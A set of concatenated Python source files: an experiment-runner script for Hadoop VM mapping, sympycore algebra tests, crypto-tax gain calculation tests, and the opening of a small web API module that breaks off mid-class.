../../../instances/hadoop/hadoop_extra/us-mid2.pn ../../../instances/hadoop/instance_list_hadoop_4vm_rnd.txt", " --max-vms=6 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid2_6vm ../../../instances/hadoop/hadoop_extra/us-mid2.pn ../../../instances/hadoop/instance_list_hadoop_6vm_rnd.txt", "--max-vms=8 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid2_8vm ../../../instances/hadoop/hadoop_extra/us-mid2.pn ../../../instances/hadoop/instance_list_hadoop_8vm_rnd.txt", " --max-vms=10 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid2_10vm ../../../instances/hadoop/hadoop_extra/us-mid2.pn ../../../instances/hadoop/instance_list_hadoop_10vm_rnd.txt", " --max-vms=12 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_mid2_12vm ../../../instances/hadoop/hadoop_extra/us-mid2.pn ../../../instances/hadoop/instance_list_hadoop_12vm_rnd.txt", " --max-vms=4 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west2_4vm ../../../instances/hadoop/hadoop_extra/us-west2.pn ../../../instances/hadoop/instance_list_hadoop_4vm_rnd.txt", " --max-vms=6 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west2_6vm ../../../instances/hadoop/hadoop_extra/us-west2.pn ../../../instances/hadoop/instance_list_hadoop_6vm_rnd.txt", "--max-vms=8 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west2_8vm ../../../instances/hadoop/hadoop_extra/us-west2.pn ../../../instances/hadoop/instance_list_hadoop_8vm_rnd.txt", " --max-vms=10 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west2_10vm ../../../instances/hadoop/hadoop_extra/us-west2.pn ../../../instances/hadoop/instance_list_hadoop_10vm_rnd.txt", " --max-vms=12 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west2_12vm ../../../instances/hadoop/hadoop_extra/us-west2.pn ../../../instances/hadoop/instance_list_hadoop_12vm_rnd.txt", " --max-vms=4 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west1_4vm ../../../instances/hadoop/hadoop_extra/us-west1.pn ../../../instances/hadoop/instance_list_hadoop_4vm_rnd.txt", " --max-vms=6 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west1_6vm ../../../instances/hadoop/hadoop_extra/us-west1.pn ../../../instances/hadoop/instance_list_hadoop_6vm_rnd.txt", "--max-vms=8 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west1_8vm ../../../instances/hadoop/hadoop_extra/us-west1.pn ../../../instances/hadoop/instance_list_hadoop_8vm_rnd.txt", " --max-vms=10 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west1_10vm ../../../instances/hadoop/hadoop_extra/us-west1.pn ../../../instances/hadoop/instance_list_hadoop_10vm_rnd.txt", " --max-vms=12 --max-cores=8 --max-ram=16 --timelog=timelogs/config_results_vdcmapper_hadoop_us_west1_12vm ../../../instances/hadoop/hadoop_extra/us-west1.pn ../../../instances/hadoop/instance_list_hadoop_12vm_rnd.txt" ] for inst in instance_commands: full_command = command + " " + inst print("Running: " + full_command) subprocess.call(full_command,shell=True,env=os.environ)

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c1708883794704ba8d412255f7f2a4c51dcfda28

14,006

py

Python

sympycore/ring/tests/test_commutative_algebra.py

radovankavicky/pymaclab

21da758f64ed0b62969c9289576f677e977cfd98

[ "Apache-2.0" ]

96

2015-01-25T05:59:56.000Z

2021-12-29T14:05:22.000Z

sympycore/ring/tests/test_commutative_algebra.py

1zinnur9/pymaclab

21da758f64ed0b62969c9289576f677e977cfd98

[ "Apache-2.0" ]

3

2015-12-17T19:25:46.000Z

2018-06-19T07:05:20.000Z

sympycore/ring/tests/test_commutative_algebra.py

1zinnur9/pymaclab

21da758f64ed0b62969c9289576f677e977cfd98

[ "Apache-2.0" ]

36

2016-01-31T15:22:01.000Z

2021-03-29T07:03:07.000Z

from sympycore import CommutativeRing, heads, Expr, core def test_add(): x,y,z = map(CommutativeRing, 'xyz') assert x+y == y+x assert x+2 == 2+x assert str(x+y) in ['x + y', 'y + x'],str(x+y) assert str(2+x) in ['2 + x', 'x + 2'], str(2+x) def test_mul(): x,y,z = map(CommutativeRing, 'xyz') assert x*y == y*x assert x*2 == 2*x assert str(x*y) in ['x*y', 'y*x'],str(x*y) assert str(2*x) == '2*x', str(2*x) assert str(x*2) == '2*x', str(x*2) assert y*(2*x)==(y*2)*x assert str(y*(2*x)) in ['2*x*y','2*y*x'], str(y*(2*x)) assert x*(y*z)==(x*y)*z assert str(x*y*z) in ['x*y*z','y*x*z'], str(x*y*z) assert (2*x)*(y*z)==(x*y)*(2*z) assert str((2*x)*(y*z)) in ['2*x*y*z', '2*y*x*z'], str((2*x)*(y*z)) assert (y*x)*(y*z)==x*y*z*y assert (y*y)*(x*z)==x*y**2*z assert str(x*y*z*y) in ['y**2*x*z'], str(x*y*z*y) assert (y*y)*y==y*(y*y) assert (y*y)*(y*y)==y*(y*y)*y assert str(y*y*y)=='y**3',str(y*y*y) assert (x*x)*(y*y)==x*(x*y)*y assert str((x*x)*(y*y))=='y**2*x**2',str((x*x)*(y*y)) def test_diff(): x,y,z = map(CommutativeRing, 'xyz') assert x.diff(x, order=0)==x, str(x.diff(x, order=0)) assert x.diff(x)==1, str(x.diff(x)) assert x.diff('x')==1, str(x.diff('x')) def test_to(): x,y,z = map(CommutativeRing, 'xyz') assert x.to(heads.EXP_COEFF_DICT).data==(('x',), {core.IntegerList([1]):1}) assert x.to(heads.EXP_COEFF_DICT, x, y).data==(('x','y'), {core.IntegerList([1,0]):1}) assert (x+y).to(heads.EXP_COEFF_DICT).data==(('x', 'y'), {core.IntegerList([1,0]):1,core.IntegerList([0,1]):1}) assert (x+y).to(heads.EXP_COEFF_DICT, x,y).data==(('x', 'y'), {core.IntegerList([1,0]):1,core.IntegerList([0,1]):1}) assert (x+y).to(heads.EXP_COEFF_DICT, x).data==(('x', 'y'), {core.IntegerList([1,0]):1,core.IntegerList([0,1]):1}) assert (x*2).to(heads.EXP_COEFF_DICT).data==(('x',), {core.IntegerList([1]):2}), (x*2).to(heads.EXP_COEFF_DICT).data commutative_operations_results = '''\ (1)/(0):zoo (x)/(0):zoo (2*x)/(0):zoo (0)+(2):2 (0)-(2):-2 (0)*(2):0 (0)/(2):0 (0)**(2):0 (0)+(x):x (0)-(x):-x (0)*(x):0 (0)/(x):0 (0)**(x):0**x (0)+(2*x):2*x (0)-(2*x):-2*x (0)*(2*x):0 (0)/(2*x):0 (0)**(2*x):0**(2*x) (0)+(y + x):y + x (0)-(y + x):-y - x (0)*(y + x):0 (0)/(y + x):0 (0)**(y + x):0**(y + x) (0)+(x**2):x**2 (0)-(x**2):-x**2 (0)*(x**2):0 (0)/(x**2):0 (0)**(x**2):0**x**2 (0)+(y*x):y*x (0)-(y*x):-y*x (0)*(y*x):0 (0)/(y*x):0 (0)**(y*x):0**(y*x) (0)+(Foo(x)):Foo(x) (0)-(Foo(x)):-Foo(x) (0)*(Foo(x)):0 (0)/(Foo(x)):0 (0)**(Foo(x)):0**Foo(x) (0)+(Foo):Foo (0)-(Foo):-Foo (0)*(Foo):0 (0)/(Foo):0 (0)**(Foo):0**Foo (1)+(2):3 (1)-(2):-1 (1)*(2):2 (1)/(2):1/2 (1)**(2):1 (1)+(x):x + 1 (1)-(x):-x + 1 (1)*(x):x (1)/(x):1/x (1)**(x):1 (1)+(2*x):2*x + 1 (1)-(2*x):-2*x + 1 (1)*(2*x):2*x (1)/(2*x):1/2/x (1)**(2*x):1 (1)+(y + x):y + x + 1 (1)-(y + x):-y - x + 1 (1)*(y + x):y + x (1)/(y + x):1/(y + x) (1)**(y + x):1 (1)+(x**2):1 + x**2 (1)-(x**2):1 - x**2 (1)*(x**2):x**2 (1)/(x**2):1/x**2 (1)**(x**2):1 (1)+(y*x):1 + y*x (1)-(y*x):1 - y*x (1)*(y*x):y*x (1)**(y*x):1 +(2):2 -(2):-2 (2)+(1):3 (2)-(1):1 (2)-(0):2 (2)+(0):2 (2)*(1):2 (2)*(0):0 (2)/(1):2 (2)/(0):zoo (2)**(1):2 (2)**(0):1 (2)+(2):4 (2)-(2):0 (2)*(2):4 (2)/(2):1 (2)**(2):4 (2)+(x):2 + x (2)-(x):-x + 2 (2)*(x):2*x (2)/(x):2/x (2)**(x):2**x (2)+(2*x):2*x + 2 (2)-(2*x):-2*x + 2 (2)*(2*x):4*x (2)/(2*x):1/x (2)**(2*x):2**(2*x) (2)+(y + x):y + x + 2 (2)-(y + x):-y - x + 2 (2)*(y + x):2*y + 2*x (2)/(y + x):2/(y + x) (2)**(y + x):2**(y + x) (2)+(x**2):2 + x**2 (2)-(x**2):2 - x**2 (2)*(x**2):2*x**2 (2)/(x**2):2/x**2 (2)**(x**2):2**x**2 (2)+(y*x):2 + y*x (2)-(y*x):2 - y*x (2)*(y*x):2*y*x (2)**(y*x):2**(y*x) +(x):x -(x):-x (x)+(1):x + 1 (x)-(1):x - 1 (x)*(1):x (x)/(1):x (x)**(1):x (x)+(2):x + 2 (x)-(2):x - 2 (x)*(2):2*x (x)/(2):1/2*x (x)**(2):x**2 (x)+(x):2*x (x)-(x):0 (x)*(x):x**2 (x)/(x):1 (x)**(x):x**x (x)+(2*x):3*x (x)-(2*x):-x (x)*(2*x):2*x**2 (x)/(2*x):1/2 (x)**(2*x):x**(2*x) (x)+(y + x):y + 2*x (x)-(y + x):-y (x)*(y + x):x*(y + x) (x)/(y + x):x/(y + x) (x)**(y + x):x**(y + x) (x)+(x**2):x + x**2 (x)-(x**2):x - x**2 (x)*(x**2):x**3 (x)/(x**2):1/x (x)**(x**2):x**x**2 (x)+(y*x):x + y*x (x)-(y*x):x - y*x (x)*(y*x):y*x**2 (x)/(y*x):1/y (x)**(y*x):x**(y*x) +(2*x):2*x -(2*x):-2*x (2*x)+(1):2*x + 1 (2*x)-(1):2*x - 1 (2*x)*(1):2*x (2*x)/(1):2*x (2*x)**(1):2*x (2*x)+(2):2*x + 2 (2*x)-(2):2*x - 2 (2*x)*(2):4*x (2*x)/(2):x (2*x)**(2):4*x**2 (2*x)+(x):3*x (2*x)-(x):x (2*x)*(x):2*x**2 (2*x)/(x):2 (2*x)**(x):(2*x)**x (2*x)+(2*x):4*x (2*x)-(2*x):0 (2*x)*(2*x):4*x**2 (2*x)/(2*x):1 (2*x)**(2*x):(2*x)**(2*x) (2*x)+(y + x):y + 3*x (2*x)-(y + x):-y + x (2*x)*(y + x):2*x*(y + x) (2*x)/(y + x):2*x/(y + x) (2*x)**(y + x):(2*x)**(y + x) (2*x)+(x**2):2*x + x**2 (2*x)-(x**2):2*x - x**2 (2*x)*(x**2):2*x**3 (2*x)/(x**2):2/x (2*x)**(x**2):(2*x)**x**2 (2*x)+(y*x):2*x + y*x (2*x)-(y*x):2*x - y*x (2*x)*(y*x):2*y*x**2 (2*x)/(y*x):2/y (2*x)**(y*x):(2*x)**(y*x) +(y + x):y + x -(y + x):-y - x (y + x)+(1):y + x + 1 (y + x)-(1):y + x - 1 (y + x)*(1):y + x (y + x)/(1):y + x (y + x)**(1):y + x (y + x)+(2):y + x + 2 (y + x)-(2):y + x - 2 (y + x)*(2):2*y + 2*x (y + x)/(2):1/2*y + 1/2*x (y + x)**(2):(y + x)**2 (y + x)+(x):y + 2*x (y + x)-(x):y (y + x)*(x):x*(y + x) (y + x)/(x):1/x*(y + x) (y + x)**(x):(y + x)**x (y + x)+(2*x):y + 3*x (y + x)-(2*x):y - x (y + x)*(2*x):2*x*(y + x) (y + x)/(2*x):1/2/x*(y + x) (y + x)**(2*x):(y + x)**(2*x) (y + x)+(y + x):2*y + 2*x (y + x)-(y + x):0 (y + x)*(y + x):(y + x)**2 (y + x)/(y + x):1 (y + x)**(y + x):(y + x)**(y + x) (y + x)+(x**2):y + x + x**2 (y + x)-(x**2):y + x - x**2 (y + x)*(x**2):x**2*(y + x) (y + x)/(x**2):1/x**2*(y + x) (y + x)**(x**2):(y + x)**x**2 (y + x)+(y*x):y + x + y*x (y + x)-(y*x):y + x - y*x (y + x)*(y*x):y*x*(y + x) (y + x)/(y*x):1/y/x*(y + x) (y + x)**(y*x):(y + x)**(y*x) +(x**2):x**2 -(x**2):-x**2 (x**2)+(1):1 + x**2 (x**2)-(1):-1 + x**2 (x**2)*(1):x**2 (x**2)/(1):x**2 (x**2)**(1):x**2 (x**2)+(2):2 + x**2 (x**2)-(2):-2 + x**2 (x**2)*(2):2*x**2 (x**2)/(2):1/2*x**2 (x**2)**(2):x**4 (x**2)+(x):x + x**2 (x**2)-(x):-x + x**2 (x**2)*(x):x**3 (x**2)/(x):x (x**2)**(x):(x**2)**x (x**2)+(2*x):2*x + x**2 (x**2)-(2*x):-2*x + x**2 (x**2)*(2*x):2*x**3 (x**2)/(2*x):1/2*x (x**2)**(2*x):(x**2)**(2*x) (x**2)+(y + x):y + x + x**2 (x**2)-(y + x):-y - x + x**2 (x**2)*(y + x):x**2*(y + x) (x**2)/(y + x):x**2/(y + x) (x**2)**(y + x):(x**2)**(y + x) (x**2)+(x**2):2*x**2 (x**2)-(x**2):0 (x**2)*(x**2):x**4 (x**2)/(x**2):1 (x**2)**(x**2):(x**2)**x**2 (x**2)+(y*x):y*x + x**2 (x**2)-(y*x):-y*x + x**2 (x**2)*(y*x):y*x**3 (x**2)/(y*x):x/y;1/y*x (x**2)**(y*x):(x**2)**(y*x) +(y*x):y*x -(y*x):-y*x (y*x)+(1):1 + y*x (y*x)-(1):-1 + y*x (y*x)*(1):y*x (y*x)/(1):y*x (y*x)**(1):y*x (y*x)+(2):2 + y*x (y*x)-(2):-2 + y*x (y*x)*(2):2*y*x (y*x)/(2):1/2*y*x (y*x)**(2):y**2*x**2 (y*x)+(x):x + y*x (y*x)-(x):-x + y*x (y*x)*(x):y*x**2 (y*x)/(x):y (y*x)**(x):(y*x)**x (y*x)+(2*x):2*x + y*x (y*x)-(2*x):-2*x + y*x (y*x)*(2*x):2*y*x**2 (y*x)**(2*x):(y*x)**(2*x) (y*x)+(y + x):y + x + y*x (y*x)-(y + x):-y - x + y*x (y*x)*(y + x):y*x*(y + x) (y*x)**(y + x):(y*x)**(y + x) (y*x)+(x**2):y*x + x**2 (y*x)-(x**2):y*x - x**2 (y*x)*(x**2):y*x**3 (y*x)/(x**2):y/x (y*x)**(x**2):(y*x)**x**2 (y*x)+(y*x):2*y*x (y*x)-(y*x):0 (y*x)*(y*x):y**2*x**2 (y*x)/(y*x):1 (y*x)**(y*x):(y*x)**(y*x) (1)/(y*x):1/y/x (2)/(y*x):2/y/x (y*x)/(2*x):1/2*y (y*x)/(y + x):y*x/(y + x) (1)+(Foo(x)):Foo(x) + 1 (1)-(Foo(x)):-Foo(x) + 1;1 - Foo(x) (1)*(Foo(x)):Foo(x) (1)/(Foo(x)):1/Foo(x) (1)**(Foo(x)):1 (2)+(Foo(x)):2 + Foo(x) (2)-(Foo(x)):-Foo(x) + 2 (2)*(Foo(x)):2*Foo(x) (2)/(Foo(x)):2/Foo(x) (2)**(Foo(x)):2**Foo(x) (x)+(Foo(x)):x + Foo(x) (x)-(Foo(x)):-Foo(x) + x;x - Foo(x) (x)*(Foo(x)):x*Foo(x) (x)/(Foo(x)):x/Foo(x) (x)**(Foo(x)):x**Foo(x) (2*x)+(Foo(x)):2*x + Foo(x) (2*x)-(Foo(x)):2*x - Foo(x) (2*x)*(Foo(x)):2*x*Foo(x) (2*x)/(Foo(x)):2*x/Foo(x) (2*x)**(Foo(x)):(2*x)**Foo(x) (y + x)+(Foo(x)):y + x + Foo(x) (y + x)-(Foo(x)):y + x - Foo(x) (y + x)*(Foo(x)):Foo(x)*(y + x) (y + x)/(Foo(x)):1/Foo(x)*(y + x) (y + x)**(Foo(x)):(y + x)**Foo(x) (x**2)+(Foo(x)):Foo(x) + x**2 (x**2)-(Foo(x)):-Foo(x) + x**2 (x**2)*(Foo(x)):Foo(x)*x**2 (x**2)/(Foo(x)):x**2/Foo(x) (x**2)**(Foo(x)):(x**2)**Foo(x) (y*x)+(Foo(x)):Foo(x) + y*x (y*x)-(Foo(x)):-Foo(x) + y*x (y*x)*(Foo(x)):y*x*Foo(x) (y*x)/(Foo(x)):y*x/Foo(x) (y*x)**(Foo(x)):(y*x)**Foo(x) +(Foo(x)):Foo(x) -(Foo(x)):-Foo(x) (Foo(x))+(1):Foo(x) + 1 (Foo(x))-(1):Foo(x) - 1 (Foo(x))*(1):Foo(x) (Foo(x))/(1):Foo(x) (Foo(x))**(1):Foo(x) (Foo(x))+(2):Foo(x) + 2 (Foo(x))-(2):Foo(x) - 2 (Foo(x))*(2):2*Foo(x) (Foo(x))/(2):1/2*Foo(x) (Foo(x))**(2):Foo(x)**2 (Foo(x))+(x):Foo(x) + x (Foo(x))-(x):-x + Foo(x); Foo(x) - x (Foo(x))*(x):Foo(x)*x (Foo(x))/(x):Foo(x)/x (Foo(x))**(x):Foo(x)**x (Foo(x))+(2*x):2*x + Foo(x) (Foo(x))-(2*x):-2*x + Foo(x) (Foo(x))*(2*x):2*Foo(x)*x (Foo(x))/(2*x):1/2*Foo(x)/x (Foo(x))**(2*x):Foo(x)**(2*x) (Foo(x))+(y + x):y + x + Foo(x) (Foo(x))-(y + x):-y - x + Foo(x) (Foo(x))*(y + x):Foo(x)*(y + x) (Foo(x))/(y + x):Foo(x)/(y + x) (Foo(x))**(y + x):Foo(x)**(y + x) (Foo(x))+(x**2):Foo(x) + x**2 (Foo(x))-(x**2):Foo(x) - x**2 (Foo(x))*(x**2):Foo(x)*x**2 (Foo(x))/(x**2):Foo(x)/x**2 (Foo(x))**(x**2):Foo(x)**x**2 (Foo(x))+(y*x):Foo(x) + y*x (Foo(x))-(y*x):Foo(x) - y*x (Foo(x))*(y*x):y*x*Foo(x) (Foo(x))/(y*x):1/y*Foo(x)/x (Foo(x))**(y*x):Foo(x)**(y*x) (Foo(x))+(Foo(x)):2*Foo(x) (Foo(x))-(Foo(x)):0 (Foo(x))*(Foo(x)):Foo(x)**2 (Foo(x))/(Foo(x)):1 (Foo(x))**(Foo(x)):Foo(x)**Foo(x) (1)+(Foo):1 + Foo (1)-(Foo):1 - Foo (1)*(Foo):Foo (1)/(Foo):1/Foo (1)**(Foo):1 (2)+(Foo):2 + Foo (2)-(Foo):2 - Foo (2)*(Foo):2*Foo (2)/(Foo):2/Foo (2)**(Foo):2**Foo (x)+(Foo):x + Foo (x)-(Foo):x - Foo (x)*(Foo):x*Foo (x)/(Foo):x/Foo (x)**(Foo):x**Foo (2*x)+(Foo):2*x + Foo (2*x)-(Foo):2*x - Foo (2*x)*(Foo):2*x*Foo (2*x)/(Foo):2*x/Foo (2*x)**(Foo):(2*x)**Foo (y + x)+(Foo):y + x + Foo (y + x)-(Foo):y + x - Foo (y + x)*(Foo):(y + x)*Foo (y + x)/(Foo):(y + x)/Foo (y + x)**(Foo):(y + x)**Foo (x**2)+(Foo):x**2 + Foo (x**2)-(Foo):x**2 - Foo (x**2)*(Foo):x**2*Foo (x**2)/(Foo):x**2/Foo (x**2)**(Foo):(x**2)**Foo (y*x)+(Foo):y*x + Foo (y*x)-(Foo):y*x - Foo (y*x)*(Foo):y*x*Foo (y*x)/(Foo):y*x/Foo (y*x)**(Foo):(y*x)**Foo (Foo(x))+(Foo):Foo(x) + Foo (Foo(x))-(Foo):Foo(x) - Foo (Foo(x))*(Foo):Foo(x)*Foo (Foo(x))/(Foo):Foo(x)/Foo (Foo(x))**(Foo):Foo(x)**Foo +(Foo):Foo -(Foo):-Foo (Foo)+(1):1 + Foo (Foo)-(1):-1 + Foo (Foo)*(1):Foo (Foo)/(1):Foo (Foo)**(1):Foo (Foo)+(2):2 + Foo (Foo)-(2):-2 + Foo (Foo)*(2):2*Foo (Foo)/(2):1/2*Foo (Foo)**(2):Foo**2 (Foo)+(x):x + Foo (Foo)-(x):-x + Foo (Foo)*(x):x*Foo (Foo)/(x):1/x*Foo (Foo)**(x):Foo**x (Foo)+(2*x):2*x + Foo (Foo)-(2*x):-2*x + Foo (Foo)*(2*x):2*x*Foo (Foo)/(2*x):1/2/x*Foo (Foo)**(2*x):Foo**(2*x) (Foo)+(y + x):y + x + Foo (Foo)-(y + x):-y - x + Foo (Foo)*(y + x):(y + x)*Foo (Foo)/(y + x):1/(y + x)*Foo (Foo)**(y + x):Foo**(y + x) (Foo)+(x**2):x**2 + Foo (Foo)-(x**2):-x**2 + Foo (Foo)*(x**2):x**2*Foo (Foo)/(x**2):1/x**2*Foo (Foo)**(x**2):Foo**x**2 (Foo)+(y*x):y*x + Foo (Foo)-(y*x):-y*x + Foo (Foo)*(y*x):y*x*Foo (Foo)/(y*x):1/y/x*Foo (Foo)**(y*x):Foo**(y*x) (Foo)+(Foo(x)):Foo(x) + Foo (Foo)-(Foo(x)):-Foo(x) + Foo (Foo)*(Foo(x)):Foo(x)*Foo (Foo)/(Foo(x)):1/Foo(x)*Foo (Foo)**(Foo(x)):Foo**Foo(x) (Foo)+(Foo):2*Foo (Foo)-(Foo):0 (Foo)*(Foo):Foo**2 (Foo)/(Foo):1 (Foo)**(Foo):Foo**Foo (Foo(x))+(0):Foo(x) (x)+(0):x (x)-(0):x (x)*(0):0 (x)**(0):1 (2*x)+(0):2*x (2*x)-(0):2*x (2*x)*(0):0 (2*x)**(0):1 (y + x)+(0):y + x (y + x)-(0):y + x (y + x)*(0):0 (y + x)/(0):zoo (y + x)**(0):1 (x**2)+(0):x**2 (x**2)-(0):x**2 (x**2)*(0):0 (x**2)/(0):zoo (x**2)**(0):1 (y*x)+(0):y*x (y*x)-(0):y*x (y*x)*(0):0 (y*x)/(0):zoo (y*x)**(0):1 (Foo(x))-(0):Foo(x) (Foo(x))*(0):0 (Foo(x))/(0):zoo (Foo(x))**(0):1 (Foo)+(0):Foo (Foo)-(0):Foo (Foo)*(0):0 (Foo)/(0):zoo (Foo)**(0):1 ''' def test_commutative_operations(): Ring = CommutativeRing x,y,z = map(Ring, 'xyz') FRing = Ring.get_function_algebra() def Foo(x): return Ring(heads.APPLY, (foo, (Ring(x),))) foo = FRing(heads.CALLABLE, Foo) operands = [1, Ring(heads.NUMBER, 2), 0, x, Ring(heads.TERM_COEFF, (x, 2)), # 2*x Ring(heads.TERM_COEFF_DICT, {x:1, y:1}), # x+y Ring(heads.POW, (x, 2)), # x**2 Ring(heads.BASE_EXP_DICT, {x:1, y:1}), # x*y Foo(x), # Foo(x), foo, # function foo ] unary_operations = ['+', '-'] binary_operations = ['+', '-', '*', '/', '**'] results = {} for line in commutative_operations_results.split('\n'): line = line.strip() if ':' not in line: continue expr, result = line.split(':') for e in expr.split(';'): e = e.strip() results[e] = [r.strip() for r in result.split(';')] for op1 in operands: if isinstance(op1, Expr): for op in unary_operations: expr = '%s(%s)' % (op, op1) try: result = str(eval('%s(op1)' % (op))) except Exception, msg: print expr,'failed with %s' % (msg) raise if expr not in results: print '%s:%s' % (expr, result) continue assert result in results[expr], `results[expr], result` for op2 in operands: if not (isinstance(op1, Expr) or isinstance(op2, Expr)): continue for op in binary_operations: expr = '(%s)%s(%s)' % (op1, op, op2) try: result = str(eval('(op1)%s(op2)' % op)) except Exception, msg: print expr,'failed with %s' % (msg) raise if expr not in results: print '%s:%s' % (expr, result) continue assert result in results[expr], `results[expr], result, op1, op2`

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0

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9

c1f2c734dd8ef099b588f8b6c45f3dd3f65d5974

3,994

py

Python

src/tests/test_crypto.py

cschwarz68/CryptoTaxes

4871dad0788f5aff3b0fa69056105f46fb01c46f

[ "MIT" ]

null

src/tests/test_crypto.py

cschwarz68/CryptoTaxes

4871dad0788f5aff3b0fa69056105f46fb01c46f

[ "MIT" ]

null

src/tests/test_crypto.py

cschwarz68/CryptoTaxes

4871dad0788f5aff3b0fa69056105f46fb01c46f

[ "MIT" ]

null

#! python3 import pytest from crypto import * @pytest.fixture def lifo(): policy = "LIFO" print(policy) crypto = Crypto("CoinbaseTransactionsHistoryReport-Test.csv", policy) crypto.clear_cache() crypto.clear_output() crypto.dispose_all() dispos = Disposition(crypto.outfile) return dispos @pytest.fixture def fifo(): policy = "FIFO" print(policy) crypto = Crypto("CoinbaseTransactionsHistoryReport-Test.csv", policy) crypto.clear_cache() crypto.clear_output() crypto.dispose_all() dispos = Disposition(crypto.outfile) return dispos @pytest.fixture def hifo(): policy = "HIFO" print(policy) crypto = Crypto("CoinbaseTransactionsHistoryReport-Test.csv", policy) crypto.clear_cache() crypto.clear_output() crypto.dispose_all() dispos = Disposition(crypto.outfile) return dispos def test_lifo_btc(lifo): coin = "BTC" year = 2021 df = lifo.df gains = lifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 548.464 and round(gains_shortterm, digits) == -34.974 ) def test_lifo_xlm(lifo): coin = "XLM" year = 2021 df = lifo.df gains = lifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 409.2 and round(gains_shortterm, digits) == -14.0 ) def test_lifo_atom(lifo): coin = "ATOM" year = 2021 df = lifo.df gains = lifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 0 and round(gains_shortterm, digits) == 59.967 ) def test_fifo_btc(fifo): coin = "BTC" year = 2021 df = fifo.df gains = fifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 763.514 and round(gains_shortterm, digits) == 0 ) def test_fifo_xlm(fifo): coin = "XLM" year = 2021 df = fifo.df gains = fifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert round(gains_longterm, digits) == 440 and round(gains_shortterm, digits) == 0 def test_fifo_atom(fifo): coin = "ATOM" year = 2021 df = fifo.df gains = fifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert round(gains_longterm, digits) == 0 and round(gains_shortterm, digits) == 130 def test_hifo_btc(hifo): coin = "BTC" year = 2021 df = hifo.df gains = hifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 528.458 and round(gains_shortterm, digits) == -34.974 ) def test_hifo_xlm(hifo): coin = "XLM" year = 2021 df = hifo.df gains = hifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 409.2 and round(gains_shortterm, digits) == -14 ) def test_hifo_atom(hifo): coin = "ATOM" year = 2021 df = hifo.df gains = hifo.gains df_year = df[df["year"] == year] dfasset = df_year[df_year["Asset"] == coin] gains_longterm, gains_shortterm = gains(dfasset) assert ( round(gains_longterm, digits) == 0 and round(gains_shortterm, digits) == 59.965 )

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null

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7

a9c71ee7f08fc48f3bff23c81ccee4e24666d363

4,595

py

Python

declapi.py

emlynoregan/sutlstudio

ec8b65496cf3ceeb7b28c7481a5218013c2c19de

[ "Apache-2.0" ]

null

declapi.py

emlynoregan/sutlstudio

ec8b65496cf3ceeb7b28c7481a5218013c2c19de

[ "Apache-2.0" ]

null

declapi.py

emlynoregan/sutlstudio

ec8b65496cf3ceeb7b28c7481a5218013c2c19de

[ "Apache-2.0" ]

null

from apibase import APIBase import json from decl import Decl, Dist #from google.appengine.ext import ndb class GetDistById(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") lresult = Dist.GetById(lkeyId, aUser) if lresult: return 200, json.dumps(lresult.to_json()) else: return 404, "Dist not found" @classmethod def GetAPIPath(cls): return "/api/getdist" class SetDistById(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): Dist.from_json(aQueryJson, aUser) return 200, "ok" @classmethod def GetAPIPath(cls): return "/api/setdist" class DelDistById(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") lresult = Dist.GetById(lkeyId, aUser) if lresult: lresult.DeleteChildren() lresult.key.delete() return 200, "ok" else: return 404, "dist not found" @classmethod def GetAPIPath(cls): return "/api/deldist" class GetAllDistsForParent(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") if lkeyId: lresult = Dist.GetById(lkeyId, aUser) if not (lkeyId and not lresult): lchildren = Dist.GetAllForParent(lkeyId, aUser) return 200, json.dumps({"children": [lchild.to_json() for lchild in lchildren]}) else: return 404, "dist not found" @classmethod def GetAPIPath(cls): return "/api/getchilddists" class GetDeclById(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, aQueryJson, aUser): lkeyId = aQueryJson.get("id") lresult = Decl.GetById(lkeyId, aUser) if lresult: return 200, json.dumps(lresult.to_json()) else: return 404, "Decl not found" @classmethod def GetAPIPath(cls): return "/api/getdecl" class SetDeclById(APIBase): @classmethod def JsonSchemaRequired(cls): return False def ProcessAPICall(self, 